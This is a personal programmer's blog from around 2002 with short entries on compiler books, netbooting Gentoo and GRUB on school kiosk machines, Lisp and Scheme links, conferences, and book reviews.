I'm sure you can all Google for other links as well as the next person

My book of the moment is Advanced Compiler Design and Implementation (1558603204) (Table of Contents). It's a real blood stopper when you open it on your lap, but it's a really good book (from what little I've read) as this stuff is pretty difficult to digup off the net. More when I've finished it.

Looking to build some kiosk boxes (Internet access only) at school so I set a P75 (16MB of memory) building Gentoo. 20 hours later is had only got to building gcc (the first time) so I scrapped that idea and installed Gentoo chrooted on metis (Gentoo is cool in that you can do that sort of thing) and copied it over.

Ouch is it slow loading galeon! I'm talking 5-10 minutes to load and display a web page. And that's after having to run X on the frame buffer because it can't seem to drive the Mach64 card. I'm going to have to look at a lighter weight solution. (maybe netscape is smaller - I'm sure the memory is the major problem).

This is today's really random link. Quite a few broken links on the page - but still lots of (maybe) interesting stuff.

Welcome to the new, NS4 f...

Welcome to the new, NS4 friendly, Imperialviolet. This is where agl stops playing web designer and goes for something simpler. Bitch away if you will. I need to improve the scripts which generate IV to handle these blog entries so I can limit the number of entries per page.

Zooko's blog links to a song called Rappers We Crush by Kompressor. I can't say it's at all to my liking - but the girl on the Kompressor page is really cute .

This link is Kuro5hinated at the moment - but I want a go once it's up again.

Kali is a Scheme which can move closures and continuations across computers. I've yet to read their paper (it's currently top of list thou), but it looks sweet

I'm off to pickup a nice big book on compiler design from Smiths tomorrow

Kotako was down for a cou...

Kotako was down for a couple of days due to a power outage, so I'm guessing lots of email bounced. I'm sure people will resend it.

An apt-get on metis foobared it as upgrading caused /bin/zsh to disappear, thus needing a power cycle and a init=/bin/sh since zsh was root's shell. The IP address also changed on the new boot so it will take a little time for the DNS to shake out (more so since the DNS server for imperialviolet.org just died).

The RIAA (boo! hiss!) has published a paper on file sharing networks. This one is lacking the torrent of crap which is the usual mark of output from these sort of organisations. At 75 pages of information I mostly already know I'm not going to read it all, however it does mention Freenet lots. Some choice quotes (mostly they are pretty nice to us!)

As of this writing,the Freenet community has yet to release a usable Windows client and demonstrate its real-world scalability.

Ok, so that's the only bad quote about Freenet that I could find (and even that's pretty fair)

My Programming Language Crisis (not mine thou). Interesting reading, even if I cannot agree with his placing Ocaml first (if only because of that syntax). But Python comes second

Andy Oram on semantic webs

I'm using SpamAssassin at the moment and it's doing a really good job at filtering spam (with little messages about why a given mail was filtered and things). However, since it's written in Perl, I'm wondering if I could manually delete the spam far faster than it can. In fact I'm pretty sure I could. Hmm

I've promised to stop playing web designer since IV renders really badly in Netscape4. Maybe if I get time I'll fix it

China's home web use soars

New KernelTraffic out (#1...

New Kernel Traffic out (#163)

My Gentoo install at school is going pretty well (certainly a lot faster than the install at home over my 56K dialup link). A few niggles about Gentoo:

In light of the last point I should remember Ctrl-SysRq-K is the one to kill the current terminal's processes. It's called SAK thou, which is why I missed it today (System Attention Key).

IV validates again as HTML and CSS. It's only HTML 4.01 Transitional thou. Maybe I should try and make it XHTML Strict or something.

Lisp kicking arse here and here (second link is NYT)

Another BIO link (OMG I look an idiot in that photo!)

**** Kotako is down (mail to agl@imperialviolet.org should still work thou) ****

Yesterday I must have got...

Yesterday I must have got about 4 hours sleep on the coach to and from London, and about 9 hours sleep last night and I still feel like I could curl up and sleep some more!

Mailed zooko about his backup MXes being broken

Mother's birthday today. Got her a huge box of chocolates and some smelly stuff (I'm awful at buying presents, but the rule if (female) { buy (smell_stuff); } seems to work pretty well)

Been reading the The Qmail Handbook. I've been using qmail for ages on all my boxes, but this is a really useful book. With an animal on the front, this would be an O'Reilly book

Another link for Aspect OP, which I've mentioned before

Guardian article on a ray of light in S.Africa's AIDS policy

If a google search returns 0 results and there's a spelling correction then google now automatically tries the corrected search

Another self link to prin...

Another self link to print off tomorrow: A Case for Automatic Run-Time Code Optimisation

Took the image out-of-lin...

Took the image out-of-line since the load times were too long

Firstly a better link to ...

Firstly a better link to the IOI2002 site which I linked to yesterday (this one's in English at least)

Maths on the Web: a link from IRC might be interesting to some people. Personally I think HTML is a massive pile of crap which is only just rescued by strict HTML 4.01 and CSS. Mozilla is implementing Math-ML in current versions but there are still many browsers for which this site could be useful. Then again you could just do the right thing and use PDF (without Type3 fonts thou!)

Lisp Magazine. Lisp is cool. Nuff said.

An old, but interesting paper on why people are violent.

Goo is a YetAnotherLanguageGoingNowhere, but at least I'm interested in this one. It's an S-expression based language (as all languages should be) which calls gcc live to do incremental compilation. Clean, but not the head-in-the-sand clean like Scheme.

Just a link to myself really since I want to print this off tomorrow (it's a paper linked from the GOO site anyway) Adaptive Optimization For Self: Reconciling High Performance With Exploratory Programming

As an end note I'd just like to say I like trains. Despite the battering that the UK rail network gets in the press I've managed to go from Warwick to Cheltenham, Cheltenham to Cambridge and back without a hitch in the last couple of weeks. For one of those trips I was even travelling on a Sunday (when track repairs and the like are done).

Well, I made the internat...

Well, I made the international team and I'm off to the world finals in South Korea. Maybe I should have a stab at learning Korean. I also got a copy of Introduction to Algorithms as a prize (the one with the hanging red things coauthored by Rivest) so I'm reading that.

I also talked to a really smart guy called TBL (who works at Lionhead) and I'm pondering some really nutty debuggering ideas now.

I should write a review of Bruce Sterling's Distraction, but I can't be bothered to write too much, so here goes with a reviewette: It's a good book, but I didn't ever feel like I cared about the characters enough to really want to read on. I could have dropped this book half way through and not batted an eye. Despite this (I should think being trapped on a train for hours and hours helped) I finished it, and it's still good by the end. Nothing stunning, but good.

Well, I'm off to BIO tomo...

Well, I'm off to BIO tomorrow so no IV updates for another weekend (but then there haven't been any since Monday anyway)

Let us look at my bookmarks over the last couple of days then

First there is Mono, the free .NET implementation. Quite a lot of smart people at the ACCU were saying that .NET has some good ideas in it (a first for Microsoft) and I was thinking about building a neat little garbage collector for it. Unfortunately it needs MS's C# compiler to build - so that idea is fscked. (with a little kernel help the GC could have been good too, oh well).

I've also been looking at Gentoo. This is a build-everything-from-src distrib it's (sortof) reviewed here on /.. Since it downloads lots (the ISO is only 16MB) you need a good internet pipe and my 56K isn't going to cut it. Thus I've been trying to install it at school (cable modem).

The first point is that GNU parted is good for resizing FAT partitions and the second is that my victim box doesn't have a CDROM (and I don't have a burner either). So in the tradition of playing with anything that looks fun (cough! Smile!) I loopback mounted the ISO and netbooted a box to run the ISO via NFS. It actually seemed to work a little. Maybe more when I get back to it Tues.

Next down in my bookmarks is Stackless Python. Now, I've always that that Python's dynamic naming was such a sucky idea (and pychecker is too much of a pain to use), but the rest of Python makes up for it. At the UK Python conference I said that Python was just becoming Lisp (w/o S-expressions) and stackless makes it more so. Basically they add continuations support and the like (Python generators are a crippled version of this).

I've also been looking at Aspect orientated programming, but haven't grokked it enough to say anything really. Looks like it might be pretty cool thou.

I've been looking at the ...

I've been looking at the Lambda library (can't find URL right now, try google). This is a pretty stunning template library for C++, an example:

for_each (l.begin(), l.end(), cout << free1 << endl);

Go read that again if you want, I'll wait. Yes, you do see code inserted in the middle of a function call - and it works! I thought Modern C++ Design was pretty stunning, but this is just wow! Now I know that Lisp does this with its eyes closed, but C++ never has been a functional language and it's a testament to templates that they can be used to do this kind of stuff.

If you don't read Dilbert, why not? Smile! [looks like Dilbert links don't stick around]

I'm back! And damm, that ...

I'm back! And damm, that conference was good. Now, I don't have great experience with conferences (O'Reilly P2P1 last year and ACCU 2002 so far). But during every slot there was something I wanted to go to, and usually 2 or 3 things. The speaker list could be read off a list of the great books on C++ and there were no managers or reporters.

My presentation went great (it was my first time presenting). Everyone said it was very impressive (admittedly, they weren't going to say it was crap to me, but they could have said nothing at all) and I had more than enough to fill the 90 minutes. In fact, if there was one thing wrong with it, it was that it was too long.

School tomorrow, sigh

I'm off to present at the...

I'm off to present at the ACCU conference. Wish me luck about 11am BST on Sat.

Because of that I'm going to be out of contact until at least Sunday

So WeHaveTheWayOut comes up running OpenBSD and after the media storm switches to IIS 5. Now it's down!. Currently returns "No web site is configured at this address.". Smile!

(note the solution to :) at the end of a bracketed sentence! Smile!)

Hmm, seems I did pretty w...

Hmm, seems I did pretty well in the Information Olympiad (however you spell it) and they want me to goto the final in Cambridge. I wonder how I'm getting there.

I found this in No Logo last night:

The most creative response came from students at the University of Toronto. A handful of undergraduates landed part-time jobs with the wash room billboard company and kept conveniently losing the custom-made screwdrivers that opened the 400 plastic frames. Pretty soon, a group calling themselves the Escher Appreciation Society were breaking into the "student-proof" frames and systematically replacing the bathroom ads with prints by Escher.

OMG! How cool are those people!! (I sound like pupok :) )

Dilbert rocks today [looks like Dilbert links don't stick around]

Well, the Queen Mother ha...

Well, the Queen Mother has died and, boy, don't we know it. Now, don't get me wrong - it's headline news, but you can't move for tributes to her. Back to back tributes, and stories about her life, stories about mourners - all for someone that few people knew and who's death will only really affect a handful of close family. Lots of very nice old women died last week - and I don't see the BBC going nuts over them.

On a more cynical note - now is just the time we need reporting on other matters as anyone with an announcement that they want to bury will be making it now. (as Mrs Moore demonstrated)

Also, we've switched to British Summer Time - which now means that my bed side clock is right (I hadn't changed it since last time :)

(and there's a question for you all - if you put a :) thing at the end of a bracket span, do you also put a close bracket?)

It's good to know there are others as cynical as I re queen mum. The usual moan is the rescheduling of TV but since there wasn't much on yesterday this is no loss. I used to think the monarchy have no power but it seems their grip on the media is their real power now. The situation remains, though, that Japanese tourists etc know more about our royal family than any of us do! Dad wanted to go to the Alfa Romeo show at the Science museum today so the announcement on Saturday night coursed him more irritation than sadness (ie London being flooded with mourners etc).

Kernel security problem...

Kernel security problem

OperationEnduring Valenti...

Operation Enduring Valenti

Sigh - madness spreads to...

Sigh - madness spreads to Canada

Preaching to the choir

Big shock: XP Server == X...

Big shock: XP Server == XP Pro etc at The Reg. The ZIP file has been pulled already - I would mirror it otherwise.

Mark Thomas is on tonight, Chan 4, 11pm (and I missed Century of the Self! Aggh!)

Bloom Filters and The future of multi-player online games

And today's (not so) wise words:

Bex: ginger is never sexy

I think will all feel smarter having read that

Well, it's the Easter hol...

Well, it's the Easter holiday and (between revision) I'm getting quite a lot of reading done. Emergence is starting to drag a little now I'm half way through. Done get me wrong, it's a good book - I'm just wondering when it's going to say something interesting. It also lacks that indefinable fluid quality to its prose which makes a book easy reading.

In its place I've picked up Flux (Stephen Baxter, 0-00-647620-1) which ok (not up to his usual standard thou), and No Logo (Naomi Klein, 0-00-653040-0). No Logo is an very interesting book on advertising and has avoided some of the fanatical anti-corporatism which is the bane of many of her peers.

No interesting papers or links recently (except maybe this)

Remember, you have to run...

Remember, you have to run as fast as you can just to stay in the same place: 1024-bit keys now considered weak. You have to keep in mind what your attack model is, but now might be the time to move to 2kb keys (at the very least you must support large keys in your apps).

A bunch of random links

Vodaphone's personally written press releases (if they pull it let me know, I have a local copy)

I dug these up for something else - but I might as well post them here:

Great comedy links from This reg page

Don't forget Century of the Self (8pm, Sunday, BBC2)

Zooko has updated his P2P...

Zooko has updated his P2P names paper

I put GRUB on the HDD of one of the netboot boxes and, thou it boots Linux ok, it can't seem to boot Windows. The docs reference a chainload command which, unfortunately, doesn't seem to exist in GRUB. So this poor box is sitting there, booting GRUB, which tries to boot Windows but ends up booting itself again in a loop - oh well.

/. has a good story about those Scientology bastards acting up again. Go read Clambake (which is /.'ed just now). Kick a Scientologist's butt today.

Wes has some good links today (another bit about CoS, one about Gosling dreaming again and PayPal SDK. The SDK looks almost worthless (no pun intended) - but it's a step in the right direction).

One of the links Wes has is to Valgrind, which is worth a read. See the impl doc. Wow

Book of the moment: Emergence, John Holland, ISBN 0-19-286211-1

Well, I got the netbootin...

Well, I got the netbooting thing working pretty well. In the end it was a 128MB box because I have no idea what NIC the 16MB boxes have.

The startup sequence goes something like this:

Which, all in all, is pretty sweet. I need allow anonymous logins and error check some more stuff in that script. I also need to setup home dirs with good Mozilla defaults (proxys setup etc). But nearly there.

Liveit (thanks to Zooko f...

Live it (thanks to Zooko for the link)

Someone mentioned net boo...

Someone mentioned net booting some of the poor bloated Windoze boxes at school just before I left Friday afternoon. I'm not quite sure what they had in mind, but it sounded like fun.

Google turned up the Diskless Nodes HOW-TO which talks about Etherboot and Netboot. I downloaded the srcs and they didn't look like what I had in mind so I did an `info grub` (as I always do for all my boot loading problems) and sure enough, GRUB does it! :).

You just need to pass a driver name at configure time and GRUB builds with all the netbooting commands. I setup zen with tftp (for the kernel) and nfs, and built a stripped down kernel for to test with a little 486 I have sitting around. This is all the GRUB you need to netboot:

dhcp
root (nd)
kernel /usr/share/tftp/bzImage root=/dev/nfs nfsroot=1.1.1.1:/nfs
ip=:1.1.1.1:1.1.1.1:255.0.0.0:nbclient:eth0:dhcp init=/bin/sh

The only difficult bit is the kernel options which are described in Documentation/nfsroot.txt

Now I've got to decide what I'm going to do. They are only 16MB boxes that's a bit small for X and Netscape (I just did that with a minimal Slackware today in 16MB). I'm going to try DirectFB/GTK+ when I have more bandwidth to download it and I may have the boxes swapping across the LAN

(it would also be cool if I could get them to SMB mount the user's home dir from the NT boxes)

Will keep iv.org posted on hos this pans out

oierw: (I would rather see work done on) whiterose (rather than a compiler) with a
varient achord
agl: I guess - I'm just bored with wrose
agl: I consider something done when I figured out all the interresting bits
agl: wrose has been `done' for ages now

FreeBSD has some cool ker...

FreeBSD has some cool kernel features like kqueue and aio (yes, you can tell me they exist in your favorite OS, if you like). Maybe I should follow this.

On the Scheme compiling front, this is a damm fine resource for the interresting bits and this is a good book (and all online!) on the subject

Found this link from acom...

Found this link from a comment on AlterSlash - I love JWZ's grumbles :).

I got the Moulin Rouge and Romeo+Juliet DVD - both really good films.

This site is really useful for UK people. It beats the sucky Radiotimes site at least

I found this in my home ...

I found this in my home dir (I often download stuff for later reading and then forget where I got it from). I've heard of it before but never read the paper (which is really worth reading - wow)

!STARTDOWNLOAD !DOWNLOAD evolved-fpga.ps.gz !ENDDOWNLOAD

Got round to fixing up iv...

Got round to fixing up iv.org, which I've been meaning to do for a long time (still looks crap in Netscrape thou). Linuxpower.org was down for the whole weekend and I'm considering if I should shift my email to iv.org - but since that it pretty much the first time lp has been down in years I'm think I'll stick with it

Currently reading papers on Scheme implimentation and thinking about optimising compilers. This is a very good resource and even links to a paper by Scott! (so it must be good :).

Looking again at Pliant, which I'm sure would be stunning if I could understand it. A little worried that it seems to lack closures, first-class functions, continuations and the like - but I would bet that you could add them within the language

Also looking at AChord which looks interresting, but certainly has some weaknesses. These don't seem too hard to fix, however and I might write something up about it sometime.

cherub:        did brandon tell you that just before his talk he thought of a really easy attack on achord?
cherub: he thinks he can fix it, though
cherub: and I think one of the slightly more complicated designs we came up with while working on achrod might not have the problem

Book of the moment: The Thread of Life 0-521-46542-7